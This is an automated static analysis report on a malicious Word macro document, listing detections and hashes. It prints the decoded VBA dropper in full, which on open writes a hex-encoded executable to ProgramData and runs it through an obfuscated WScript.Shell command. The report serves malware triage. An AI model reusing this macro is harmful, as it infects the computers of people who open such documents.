Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 e4a93f11657c6844…

MALICIOUS

Office (OLE) / .DOC

2.79 MB Created: 2025-12-15 08:52:00 Authoring application: Microsoft Office Word First seen: 2026-06-23
MD5: e87bb727393264464b37aee46c22a6d7 SHA-1: 356a6f7c9593414baa3f488679c06a2dbeedf4c7 SHA-256: e4a93f11657c6844c0c50babe574286b57b3b75b68e0108cf645a90de84de7ed
350 Risk Score

Heuristics 10

  • ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        If objName <> "WScript.Shell" Then
  • Embedded PE decoded from VBA/UserForm payload string critical OLE_VBA_EMBEDDED_PE_DROPPER
    The VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set executor = CreateObject(objName)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://https:// In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3821 bytes
SHA-256: 1ecf124e926b522b95c6055516154ae681efc88dda5e06811fb4e2e32c8fe363
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Label1, 0, 0, MSForms, Label"
Sub love_me__()
    Dim varA As String, varB As String, varC As String
    Dim varD As String, varE As String, objName As String
    Dim executor As Object, instruction As String
    Dim tempVal As Integer, i As Integer
    
    For i = 1 To 13
        Select Case i
            Case 1: tempVal = 87
            Case 2: tempVal = 83
            Case 3: tempVal = 99
            Case 4: tempVal = 114
            Case 5: tempVal = 105
            Case 6: tempVal = 112
            Case 7: tempVal = 116
            Case 8: tempVal = 46
            Case 9: tempVal = 83
            Case 10: tempVal = 104
            Case 11: tempVal = 101
            Case 12: tempVal = 108
            Case 13: tempVal = 108
        End Select
        objName = objName & Chr(tempVal)
    Next i
    
    If objName <> "WScript.Shell" Then
        MsgBox "Validation failed", vbCritical
        Exit Sub
    End If
    
    On Error GoTo ErrorHandler
    
    Set executor = CreateObject(objName)
    
    If executor Is Nothing Then
        MsgBox "Object creation failed", vbCritical
        Exit Sub
    End If
    
    Dim cmdParts(1 To 17) As Integer
    cmdParts(1) = 99:  cmdParts(2) = 109:  cmdParts(3) = 100
    cmdParts(4) = 46:  cmdParts(5) = 101:  cmdParts(6) = 120
    cmdParts(7) = 101: cmdParts(8) = 32:   cmdParts(9) = 47
    cmdParts(10) = 99: cmdParts(11) = 32:  cmdParts(12) = 67
    cmdParts(13) = 58: cmdParts(14) = 92:  cmdParts(15) = 80
    cmdParts(16) = 114: cmdParts(17) = 111 ' ÇÏÇãå...
    
    For i = 1 To 17
        instruction = instruction & Chr(cmdParts(i))
    Next i
    instruction = instruction & "gramData\CertificationKit.ini"
    executor.Run instruction, 0, False
    
    Set executor = Nothing
    Exit Sub

ErrorHandler:
    ' :)
End Sub



Sub WriteHexToFile()
    Dim hexString As String
    Dim byteData() As Byte
    Dim i As Long
    Dim fileNum As Integer
    Dim filePath As String

    hexString = UserForm1.TextBox1.Text

    hexString = Replace(hexString, " ", "")
    hexString = Replace(hexString, vbCrLf, "")
    hexString = Replace(hexString, vbLf, "")
    hexString = Replace(hexString, vbCr, "")

    If Len(hexString) Mod 2 <> 0 Then
        MsgBox "Hex string. length must0 be even. :(", vbExclamation
        Exit Sub
    End If

    ReDim byteData(Len(hexString) \ 2 - 1)
    For i = 0 To UBound(byteData)
        byteData(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))
    Next i

    filePath = "C:\\ProgramData\\CertificationKit.ini"

    fileNum = FreeFile
    Open filePath For Binary Access Write As #fileNum
        Put #fileNum, , byteData
    Close #fileNum
    
    If Cos(70 * 3.14159265 / 180) = 0 Then
        MsgBox "Hi, have a nice time :)" & filePath
    End If
End Sub



Private Sub Document_Open()


On Error GoTo AAAA
    
    Dim pth As String
    
    WriteHexToFile
    Dim fff As String
    love_me__
        
AAAA:
    If Cos(70 * 3.14119265358979 / 180) = 0 Then
        MsgBox "Hi :), have a nice time :)" & filePath
    End If


End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{ECD5CC13-BB50-4575-8B30-F8F9797EB3DE}{C185F02F-46D9-423B-BE3B-8DD30BC48620}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vba_embedded_payload.bin vba-embedded-pe decoded from a hex/base64 payload string in a VBA UserForm control or macro literal 1288192 bytes
SHA-256: 7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 7 long base64-like blob(s). Carved artifact contains 1 long hex-escaped blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.